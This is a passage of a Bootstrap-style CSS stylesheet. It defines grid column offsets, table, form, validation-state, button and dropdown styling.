left: 25%; } .col-sm-push-2 { left: 16.66666667%; } .col-sm-push-1 { left: 8.33333333%; } .col-sm-push-0 { left: auto; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666667%; } .col-sm-offset-10 { margin-left: 83.33333333%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666667%; } .col-sm-offset-7 { margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 { margin-left: 33.33333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.66666667%; } .col-sm-offset-1 { margin-left: 8.33333333%; } .col-sm-offset-0 { margin-left: 0; } } @media (min-width: 992px) { .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666667%; } .col-md-10 { width: 83.33333333%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666667%; } .col-md-7 { width: 58.33333333%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666667%; } .col-md-4 { width: 33.33333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.66666667%; } .col-md-1 { width: 8.33333333%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666667%; } .col-md-pull-10 { right: 83.33333333%; } .col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666667%; } .col-md-pull-7 { right: 58.33333333%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666667%; } .col-md-pull-4 { right: 33.33333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.66666667%; } .col-md-pull-1 { right: 8.33333333%; } .col-md-pull-0 { right: auto; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666667%; } .col-md-push-10 { left: 83.33333333%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666667%; } .col-md-push-7 { left: 58.33333333%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666667%; } .col-md-push-4 { left: 33.33333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.66666667%; } .col-md-push-1 { left: 8.33333333%; } .col-md-push-0 { left: auto; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666667%; } .col-md-offset-10 { margin-left: 83.33333333%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666667%; } .col-md-offset-7 { margin-left: 58.33333333%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666667%; } .col-md-offset-4 { margin-left: 33.33333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.66666667%; } .col-md-offset-1 { margin-left: 8.33333333%; } .col-md-offset-0 { margin-left: 0; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666667%; } .col-lg-10 { width: 83.33333333%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666667%; } .col-lg-7 { width: 58.33333333%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666667%; } .col-lg-4 { width: 33.33333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.66666667%; } .col-lg-1 { width: 8.33333333%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666667%; } .col-lg-pull-10 { right: 83.33333333%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666667%; } .col-lg-pull-7 { right: 58.33333333%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666667%; } .col-lg-pull-4 { right: 33.33333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.66666667%; } .col-lg-pull-1 { right: 8.33333333%; } .col-lg-pull-0 { right: auto; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666667%; } .col-lg-push-10 { left: 83.33333333%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666667%; } .col-lg-push-7 { left: 58.33333333%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666667%; } .col-lg-push-4 { left: 33.33333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.66666667%; } .col-lg-push-1 { left: 8.33333333%; } .col-lg-push-0 { left: auto; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666667%; } .col-lg-offset-10 { margin-left: 83.33333333%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666667%; } .col-lg-offset-7 { margin-left: 58.33333333%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666667%; } .col-lg-offset-4 { margin-left: 33.33333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.66666667%; } .col-lg-offset-1 { margin-left: 8.33333333%; } .col-lg-offset-0 { margin-left: 0; } } table { background-color: transparent; } caption { padding-top: 8px; padding-bottom: 8px; color: #777; text-align: left; } th { text-align: left; } .table { width: 100%; max-width: 100%; margin-bottom: 20px; } .table > thead > tr > th, .table > tbody > tr > th, .table > tfoot > tr > th, .table > thead > tr > td, .table > tbody > tr > td, .table > tfoot > tr > td { padding: 8px; line-height: 1.42857143; vertical-align: top; border-top: 1px solid #ddd; } .table > thead > tr > th { vertical-align: bottom; border-bottom: 2px solid #ddd; } .table > caption + thead > tr:first-child > th, .table > colgroup + thead > tr:first-child > th, .table > thead:first-child > tr:first-child > th, .table > caption + thead > tr:first-child > td, .table > colgroup + thead > tr:first-child > td, .table > thead:first-child > tr:first-child > td { border-top: 0; } .table > tbody + tbody { border-top: 2px solid #ddd; } .table .table { background-color: #fff; } .table-condensed > thead > tr > th, .table-condensed > tbody > tr > th, .table-condensed > tfoot > tr > th, .table-condensed > thead > tr > td, .table-condensed > tbody > tr > td, .table-condensed > tfoot > tr > td { padding: 5px; } .table-bordered { border: 1px solid #ddd; } .table-bordered > thead > tr > th, .table-bordered > tbody > tr > th, .table-bordered > tfoot > tr > th, .table-bordered > thead > tr > td, .table-bordered > tbody > tr > td, .table-bordered > tfoot > tr > td { border: 1px solid #ddd; } .table-bordered > thead > tr > th, .table-bordered > thead > tr > td { border-bottom-width: 2px; } .table-striped > tbody > tr:nth-of-type(odd) { background-color: #f9f9f9; } .table-hover > tbody > tr:hover { background-color: #f5f5f5; } table col[class*="col-"] { position: static; display: table-column; float: none; } table td[class*="col-"], table th[class*="col-"] { position: static; display: table-cell; float: none; } .table > thead > tr > td.active, .table > tbody > tr > td.active, .table > tfoot > tr > td.active, .table > thead > tr > th.active, .table > tbody > tr > th.active, .table > tfoot > tr > th.active, .table > thead > tr.active > td, .table > tbody > tr.active > td, .table > tfoot > tr.active > td, .table > thead > tr.active > th, .table > tbody > tr.active > th, .table > tfoot > tr.active > th { background-color: #f5f5f5; } .table-hover > tbody > tr > td.active:hover, .table-hover > tbody > tr > th.active:hover, .table-hover > tbody > tr.active:hover > td, .table-hover > tbody > tr:hover > .active, .table-hover > tbody > tr.active:hover > th { background-color: #e8e8e8; } .table > thead > tr > td.success, .table > tbody > tr > td.success, .table > tfoot > tr > td.success, .table > thead > tr > th.success, .table > tbody > tr > th.success, .table > tfoot > tr > th.success, .table > thead > tr.success > td, .table > tbody > tr.success > td, .table > tfoot > tr.success > td, .table > thead > tr.success > th, .table > tbody > tr.success > th, .table > tfoot > tr.success > th { background-color: #dff0d8; } .table-hover > tbody > tr > td.success:hover, .table-hover > tbody > tr > th.success:hover, .table-hover > tbody > tr.success:hover > td, .table-hover > tbody > tr:hover > .success, .table-hover > tbody > tr.success:hover > th { background-color: #d0e9c6; } .table > thead > tr > td.info, .table > tbody > tr > td.info, .table > tfoot > tr > td.info, .table > thead > tr > th.info, .table > tbody > tr > th.info, .table > tfoot > tr > th.info, .table > thead > tr.info > td, .table > tbody > tr.info > td, .table > tfoot > tr.info > td, .table > thead > tr.info > th, .table > tbody > tr.info > th, .table > tfoot > tr.info > th { background-color: #d9edf7; } .table-hover > tbody > tr > td.info:hover, .table-hover > tbody > tr > th.info:hover, .table-hover > tbody > tr.info:hover > td, .table-hover > tbody > tr:hover > .info, .table-hover > tbody > tr.info:hover > th { background-color: #c4e3f3; } .table > thead > tr > td.warning, .table > tbody > tr > td.warning, .table > tfoot > tr > td.warning, .table > thead > tr > th.warning, .table > tbody > tr > th.warning, .table > tfoot > tr > th.warning, .table > thead > tr.warning > td, .table > tbody > tr.warning > td, .table > tfoot > tr.warning > td, .table > thead > tr.warning > th, .table > tbody > tr.warning > th, .table > tfoot > tr.warning > th { background-color: #fcf8e3; } .table-hover > tbody > tr > td.warning:hover, .table-hover > tbody > tr > th.warning:hover, .table-hover > tbody > tr.warning:hover > td, .table-hover > tbody > tr:hover > .warning, .table-hover > tbody > tr.warning:hover > th { background-color: #faf2cc; } .table > thead > tr > td.danger, .table > tbody > tr > td.danger, .table > tfoot > tr > td.danger, .table > thead > tr > th.danger, .table > tbody > tr > th.danger, .table > tfoot > tr > th.danger, .table > thead > tr.danger > td, .table > tbody > tr.danger > td, .table > tfoot > tr.danger > td, .table > thead > tr.danger > th, .table > tbody > tr.danger > th, .table > tfoot > tr.danger > th { background-color: #f2dede; } .table-hover > tbody > tr > td.danger:hover, .table-hover > tbody > tr > th.danger:hover, .table-hover > tbody > tr.danger:hover > td, .table-hover > tbody > tr:hover > .danger, .table-hover > tbody > tr.danger:hover > th { background-color: #ebcccc; } .table-responsive { min-height: .01%; overflow-x: auto; } @media screen and (max-width: 767px) { .table-responsive { width: 100%; margin-bottom: 15px; overflow-y: hidden; -ms-overflow-style: -ms-autohiding-scrollbar; border: 1px solid #ddd; } .table-responsive > .table { margin-bottom: 0; } .table-responsive > .table > thead > tr > th, .table-responsive > .table > tbody > tr > th, .table-responsive > .table > tfoot > tr > th, .table-responsive > .table > thead > tr > td, .table-responsive > .table > tbody > tr > td, .table-responsive > .table > tfoot > tr > td { white-space: nowrap; } .table-responsive > .table-bordered { border: 0; } .table-responsive > .table-bordered > thead > tr > th:first-child, .table-responsive > .table-bordered > tbody > tr > th:first-child, .table-responsive > .table-bordered > tfoot > tr > th:first-child, .table-responsive > .table-bordered > thead > tr > td:first-child, .table-responsive > .table-bordered > tbody > tr > td:first-child, .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .table-responsive > .table-bordered > thead > tr > th:last-child, .table-responsive > .table-bordered > tbody > tr > th:last-child, .table-responsive > .table-bordered > tfoot > tr > th:last-child, .table-responsive > .table-bordered > thead > tr > td:last-child, .table-responsive > .table-bordered > tbody > tr > td:last-child, .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .table-responsive > .table-bordered > tbody > tr:last-child > th, .table-responsive > .table-bordered > tfoot > tr:last-child > th, .table-responsive > .table-bordered > tbody > tr:last-child > td, .table-responsive > .table-bordered > tfoot > tr:last-child > td { border-bottom: 0; } } fieldset { min-width: 0; padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; padding: 0; margin-bottom: 20px; font-size: 21px; line-height: inherit; color: #333; border: 0; border-bottom: 1px solid #e5e5e5; } label { display: inline-block; max-width: 100%; margin-bottom: 5px; font-weight: bold; } input[type="search"] { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } input[type="radio"], input[type="checkbox"] { margin: 4px 0 0; margin-top: 1px \9; line-height: normal; } input[type="file"] { display: block; } input[type="range"] { display: block; width: 100%; } select[multiple], select[size] { height: auto; } input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } output { display: block; padding-top: 7px; font-size: 14px; line-height: 1.42857143; color: #555; } .form-control { display: block; width: 100%; height: 34px; padding: 6px 12px; font-size: 14px; line-height: 1.42857143; color: #555; background-color: #fff; background-image: none; border: 1px solid #ccc; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s; -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; } .form-control:focus { border-color: #66afe9; outline: 0; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6); box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6); } .form-control::-moz-placeholder { color: #999; opacity: 1; } .form-control:-ms-input-placeholder { color: #999; } .form-control::-webkit-input-placeholder { color: #999; } .form-control[disabled], .form-control[readonly], fieldset[disabled] .form-control { background-color: #eee; opacity: 1; } .form-control[disabled], fieldset[disabled] .form-control { cursor: not-allowed; } textarea.form-control { height: auto; } input[type="search"] { -webkit-appearance: none; } @media screen and (-webkit-min-device-pixel-ratio: 0) { input[type="date"], input[type="time"], input[type="datetime-local"], input[type="month"] { line-height: 34px; } input[type="date"].input-sm, input[type="time"].input-sm, input[type="datetime-local"].input-sm, input[type="month"].input-sm, .input-group-sm input[type="date"], .input-group-sm input[type="time"], .input-group-sm input[type="datetime-local"], .input-group-sm input[type="month"] { line-height: 30px; } input[type="date"].input-lg, input[type="time"].input-lg, input[type="datetime-local"].input-lg, input[type="month"].input-lg, .input-group-lg input[type="date"], .input-group-lg input[type="time"], .input-group-lg input[type="datetime-local"], .input-group-lg input[type="month"] { line-height: 46px; } } .form-group { margin-bottom: 15px; } .radio, .checkbox { position: relative; display: block; margin-top: 10px; margin-bottom: 10px; } .radio label, .checkbox label { min-height: 20px; padding-left: 20px; margin-bottom: 0; font-weight: normal; cursor: pointer; } .radio input[type="radio"], .radio-inline input[type="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { position: absolute; margin-top: 4px \9; margin-left: -20px; } .radio + .radio, .checkbox + .checkbox { margin-top: -5px; } .radio-inline, .checkbox-inline { position: relative; display: inline-block; padding-left: 20px; margin-bottom: 0; font-weight: normal; vertical-align: middle; cursor: pointer; } .radio-inline + .radio-inline, .checkbox-inline + .checkbox-inline { margin-top: 0; margin-left: 10px; } input[type="radio"][disabled], input[type="checkbox"][disabled], input[type="radio"].disabled, input[type="checkbox"].disabled, fieldset[disabled] input[type="radio"], fieldset[disabled] input[type="checkbox"] { cursor: not-allowed; } .radio-inline.disabled, .checkbox-inline.disabled, fieldset[disabled] .radio-inline, fieldset[disabled] .checkbox-inline { cursor: not-allowed; } .radio.disabled label, .checkbox.disabled label, fieldset[disabled] .radio label, fieldset[disabled] .checkbox label { cursor: not-allowed; } .form-control-static { min-height: 34px; padding-top: 7px; padding-bottom: 7px; margin-bottom: 0; } .form-control-static.input-lg, .form-control-static.input-sm { padding-right: 0; padding-left: 0; } .input-sm { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-sm { height: 30px; line-height: 30px; } textarea.input-sm, select[multiple].input-sm { height: auto; } .form-group-sm .form-control { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.form-group-sm .form-control { height: 30px; line-height: 30px; } textarea.form-group-sm .form-control, select[multiple].form-group-sm .form-control { height: auto; } .form-group-sm .form-control-static { height: 30px; min-height: 32px; padding: 5px 10px; font-size: 12px; line-height: 1.5; } .input-lg { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.3333333; border-radius: 6px; } select.input-lg { height: 46px; line-height: 46px; } textarea.input-lg, select[multiple].input-lg { height: auto; } .form-group-lg .form-control { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.3333333; border-radius: 6px; } select.form-group-lg .form-control { height: 46px; line-height: 46px; } textarea.form-group-lg .form-control, select[multiple].form-group-lg .form-control { height: auto; } .form-group-lg .form-control-static { height: 46px; min-height: 38px; padding: 10px 16px; font-size: 18px; line-height: 1.3333333; } .has-feedback { position: relative; } .has-feedback .form-control { padding-right: 42.5px; } .form-control-feedback { position: absolute; top: 0; right: 0; z-index: 2; display: block; width: 34px; height: 34px; line-height: 34px; text-align: center; pointer-events: none; } .input-lg + .form-control-feedback { width: 46px; height: 46px; line-height: 46px; } .input-sm + .form-control-feedback { width: 30px; height: 30px; line-height: 30px; } .has-success .help-block, .has-success .control-label, .has-success .radio, .has-success .checkbox, .has-success .radio-inline, .has-success .checkbox-inline, .has-success.radio label, .has-success.checkbox label, .has-success.radio-inline label, .has-success.checkbox-inline label { color: #3c763d; } .has-success .form-control { border-color: #3c763d; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-success .form-control:focus { border-color: #2b542c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168; } .has-success .input-group-addon { color: #3c763d; background-color: #dff0d8; border-color: #3c763d; } .has-success .form-control-feedback { color: #3c763d; } .has-warning .help-block, .has-warning .control-label, .has-warning .radio, .has-warning .checkbox, .has-warning .radio-inline, .has-warning .checkbox-inline, .has-warning.radio label, .has-warning.checkbox label, .has-warning.radio-inline label, .has-warning.checkbox-inline label { color: #8a6d3b; } .has-warning .form-control { border-color: #8a6d3b; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-warning .form-control:focus { border-color: #66512c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b; } .has-warning .input-group-addon { color: #8a6d3b; background-color: #fcf8e3; border-color: #8a6d3b; } .has-warning .form-control-feedback { color: #8a6d3b; } .has-error .help-block, .has-error .control-label, .has-error .radio, .has-error .checkbox, .has-error .radio-inline, .has-error .checkbox-inline, .has-error.radio label, .has-error.checkbox label, .has-error.radio-inline label, .has-error.checkbox-inline label { color: #a94442; } .has-error .form-control { border-color: #a94442; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-error .form-control:focus { border-color: #843534; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483; } .has-error .input-group-addon { color: #a94442; background-color: #f2dede; border-color: #a94442; } .has-error .form-control-feedback { color: #a94442; } .has-feedback label ~ .form-control-feedback { top: 25px; } .has-feedback label.sr-only ~ .form-control-feedback { top: 0; } .help-block { display: block; margin-top: 5px; margin-bottom: 10px; color: #737373; } @media (min-width: 768px) { .form-inline .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .form-inline .form-control { display: inline-block; width: auto; vertical-align: middle; } .form-inline .form-control-static { display: inline-block; } .form-inline .input-group { display: inline-table; vertical-align: middle; } .form-inline .input-group .input-group-addon, .form-inline .input-group .input-group-btn, .form-inline .input-group .form-control { width: auto; } .form-inline .input-group > .form-control { width: 100%; } .form-inline .control-label { margin-bottom: 0; vertical-align: middle; } .form-inline .radio, .form-inline .checkbox { display: inline-block; margin-top: 0; margin-bottom: 0; vertical-align: middle; } .form-inline .radio label, .form-inline .checkbox label { padding-left: 0; } .form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] { position: relative; margin-left: 0; } .form-inline .has-feedback .form-control-feedback { top: 0; } } .form-horizontal .radio, .form-horizontal .checkbox, .form-horizontal .radio-inline, .form-horizontal .checkbox-inline { padding-top: 7px; margin-top: 0; margin-bottom: 0; } .form-horizontal .radio, .form-horizontal .checkbox { min-height: 27px; } .form-horizontal .form-group { margin-right: -15px; margin-left: -15px; } @media (min-width: 768px) { .form-horizontal .control-label { padding-top: 7px; margin-bottom: 0; text-align: right; } } .form-horizontal .has-feedback .form-control-feedback { right: 15px; } @media (min-width: 768px) { .form-horizontal .form-group-lg .control-label { padding-top: 14.333333px; } } @media (min-width: 768px) { .form-horizontal .form-group-sm .control-label { padding-top: 6px; } } .btn { display: inline-block; padding: 6px 12px; margin-bottom: 0; font-size: 14px; font-weight: normal; line-height: 1.42857143; text-align: center; white-space: nowrap; vertical-align: middle; -ms-touch-action: manipulation; touch-action: manipulation; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; background-image: none; border: 1px solid transparent; border-radius: 4px; } .btn:focus, .btn:active:focus, .btn.active:focus, .btn.focus, .btn:active.focus, .btn.active.focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .btn:hover, .btn:focus, .btn.focus { color: #333; text-decoration: none; } .btn:active, .btn.active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); } .btn.disabled, .btn[disabled], fieldset[disabled] .btn { pointer-events: none; cursor: not-allowed; filter: alpha(opacity=65); -webkit-box-shadow: none; box-shadow: none; opacity: .65; } .btn-default { color: #333; background-color: #fff; border-color: #ccc; } .btn-default:hover, .btn-default:focus, .btn-default.focus, .btn-default:active, .btn-default.active, .open > .dropdown-toggle.btn-default { color: #333; background-color: #e6e6e6; border-color: #adadad; } .btn-default:active, .btn-default.active, .open > .dropdown-toggle.btn-default { background-image: none; } .btn-default.disabled, .btn-default[disabled], fieldset[disabled] .btn-default, .btn-default.disabled:hover, .btn-default[disabled]:hover, fieldset[disabled] .btn-default:hover, .btn-default.disabled:focus, .btn-default[disabled]:focus, fieldset[disabled] .btn-default:focus, .btn-default.disabled.focus, .btn-default[disabled].focus, fieldset[disabled] .btn-default.focus, .btn-default.disabled:active, .btn-default[disabled]:active, fieldset[disabled] .btn-default:active, .btn-default.disabled.active, .btn-default[disabled].active, fieldset[disabled] .btn-default.active { background-color: #fff; border-color: #ccc; } .btn-default .badge { color: #fff; background-color: #333; } .btn-primary { color: #fff; background-color: #337ab7; border-color: #2e6da4; } .btn-primary:hover, .btn-primary:focus, .btn-primary.focus, .btn-primary:active, .btn-primary.active, .open > .dropdown-toggle.btn-primary { color: #fff; background-color: #286090; border-color: #204d74; } .btn-primary:active, .btn-primary.active, .open > .dropdown-toggle.btn-primary { background-image: none; } .btn-primary.disabled, .btn-primary[disabled], fieldset[disabled] .btn-primary, .btn-primary.disabled:hover, .btn-primary[disabled]:hover, fieldset[disabled] .btn-primary:hover, .btn-primary.disabled:focus, .btn-primary[disabled]:focus, fieldset[disabled] .btn-primary:focus, .btn-primary.disabled.focus, .btn-primary[disabled].focus, fieldset[disabled] .btn-primary.focus, .btn-primary.disabled:active, .btn-primary[disabled]:active, fieldset[disabled] .btn-primary:active, .btn-primary.disabled.active, .btn-primary[disabled].active, fieldset[disabled] .btn-primary.active { background-color: #337ab7; border-color: #2e6da4; } .btn-primary .badge { color: #337ab7; background-color: #fff; } .btn-success { color: #fff; background-color: #5cb85c; border-color: #4cae4c; } .btn-success:hover, .btn-success:focus, .btn-success.focus, .btn-success:active, .btn-success.active, .open > .dropdown-toggle.btn-success { color: #fff; background-color: #449d44; border-color: #398439; } .btn-success:active, .btn-success.active, .open > .dropdown-toggle.btn-success { background-image: none; } .btn-success.disabled, .btn-success[disabled], fieldset[disabled] .btn-success, .btn-success.disabled:hover, .btn-success[disabled]:hover, fieldset[disabled] .btn-success:hover, .btn-success.disabled:focus, .btn-success[disabled]:focus, fieldset[disabled] .btn-success:focus, .btn-success.disabled.focus, .btn-success[disabled].focus, fieldset[disabled] .btn-success.focus, .btn-success.disabled:active, .btn-success[disabled]:active, fieldset[disabled] .btn-success:active, .btn-success.disabled.active, .btn-success[disabled].active, fieldset[disabled] .btn-success.active { background-color: #5cb85c; border-color: #4cae4c; } .btn-success .badge { color: #5cb85c; background-color: #fff; } .btn-info { color: #fff; background-color: #5bc0de; border-color: #46b8da; } .btn-info:hover, .btn-info:focus, .btn-info.focus, .btn-info:active, .btn-info.active, .open > .dropdown-toggle.btn-info { color: #fff; background-color: #31b0d5; border-color: #269abc; } .btn-info:active, .btn-info.active, .open > .dropdown-toggle.btn-info { background-image: none; } .btn-info.disabled, .btn-info[disabled], fieldset[disabled] .btn-info, .btn-info.disabled:hover, .btn-info[disabled]:hover, fieldset[disabled] .btn-info:hover, .btn-info.disabled:focus, .btn-info[disabled]:focus, fieldset[disabled] .btn-info:focus, .btn-info.disabled.focus, .btn-info[disabled].focus, fieldset[disabled] .btn-info.focus, .btn-info.disabled:active, .btn-info[disabled]:active, fieldset[disabled] .btn-info:active, .btn-info.disabled.active, .btn-info[disabled].active, fieldset[disabled] .btn-info.active { background-color: #5bc0de; border-color: #46b8da; } .btn-info .badge { color: #5bc0de; background-color: #fff; } .btn-warning { color: #fff; background-color: #f0ad4e; border-color: #eea236; } .btn-warning:hover, .btn-warning:focus, .btn-warning.focus, .btn-warning:active, .btn-warning.active, .open > .dropdown-toggle.btn-warning { color: #fff; background-color: #ec971f; border-color: #d58512; } .btn-warning:active, .btn-warning.active, .open > .dropdown-toggle.btn-warning { background-image: none; } .btn-warning.disabled, .btn-warning[disabled], fieldset[disabled] .btn-warning, .btn-warning.disabled:hover, .btn-warning[disabled]:hover, fieldset[disabled] .btn-warning:hover, .btn-warning.disabled:focus, .btn-warning[disabled]:focus, fieldset[disabled] .btn-warning:focus, .btn-warning.disabled.focus, .btn-warning[disabled].focus, fieldset[disabled] .btn-warning.focus, .btn-warning.disabled:active, .btn-warning[disabled]:active, fieldset[disabled] .btn-warning:active, .btn-warning.disabled.active, .btn-warning[disabled].active, fieldset[disabled] .btn-warning.active { background-color: #f0ad4e; border-color: #eea236; } .btn-warning .badge { color: #f0ad4e; background-color: #fff; } .btn-danger { color: #fff; background-color: #d9534f; border-color: #d43f3a; } .btn-danger:hover, .btn-danger:focus, .btn-danger.focus, .btn-danger:active, .btn-danger.active, .open > .dropdown-toggle.btn-danger { color: #fff; background-color: #c9302c; border-color: #ac2925; } .btn-danger:active, .btn-danger.active, .open > .dropdown-toggle.btn-danger { background-image: none; } .btn-danger.disabled, .btn-danger[disabled], fieldset[disabled] .btn-danger, .btn-danger.disabled:hover, .btn-danger[disabled]:hover, fieldset[disabled] .btn-danger:hover, .btn-danger.disabled:focus, .btn-danger[disabled]:focus, fieldset[disabled] .btn-danger:focus, .btn-danger.disabled.focus, .btn-danger[disabled].focus, fieldset[disabled] .btn-danger.focus, .btn-danger.disabled:active, .btn-danger[disabled]:active, fieldset[disabled] .btn-danger:active, .btn-danger.disabled.active, .btn-danger[disabled].active, fieldset[disabled] .btn-danger.active { background-color: #d9534f; border-color: #d43f3a; } .btn-danger .badge { color: #d9534f; background-color: #fff; } .btn-link { font-weight: normal; color: #337ab7; border-radius: 0; } .btn-link, .btn-link:active, .btn-link.active, .btn-link[disabled], fieldset[disabled] .btn-link { background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .btn-link, .btn-link:hover, .btn-link:focus, .btn-link:active { border-color: transparent; } .btn-link:hover, .btn-link:focus { color: #23527c; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, fieldset[disabled] .btn-link:hover, .btn-link[disabled]:focus, fieldset[disabled] .btn-link:focus { color: #777; text-decoration: none; } .btn-lg, .btn-group-lg > .btn { padding: 10px 16px; font-size: 18px; line-height: 1.3333333; border-radius: 6px; } .btn-sm, .btn-group-sm > .btn { padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-xs, .btn-group-xs > .btn { padding: 1px 5px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-block { display: block; width: 100%; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .fade { opacity: 0; -webkit-transition: opacity .15s linear; -o-transition: opacity .15s linear; transition: opacity .15s linear; } .fade.in { opacity: 1; } .collapse { display: none; } .collapse.in { display: block; } tr.collapse.in { display: table-row; } tbody.collapse.in { display: table-row-group; } .collapsing { position: relative; height: 0; overflow: hidden; -webkit-transition-timing-function: ease; -o-transition-timing-function: ease; transition-timing-function: ease; -webkit-transition-duration: .35s; -o-transition-duration: .35s; transition-duration: .35s; -webkit-transition-property: height, visibility; -o-transition-property: height, visibility; transition-property: height, visibility; } .caret { display: inline-block; width: 0; height: 0; margin-left: 2px; vertical-align: middle; border-top: 4px dashed; border-right: 4px solid transparent; border-left: 4px solid transparent; } .dropup, .dropdown { position: relative; } .dropdown-toggle:focus { outline: 0; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; font-size: 14px; text-align: left; list-style: none; background-color: #fff; -webkit-background-clip: padding-box; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, .15); border-radius: 4px; -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, .175); box-shadow: 0 6px 12px rgba(0, 0, 0, .175); } .dropdown-menu.pull-right { right: 0; left: auto; } .dropdown-menu .divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .dropdown-menu > li > a { display: block; 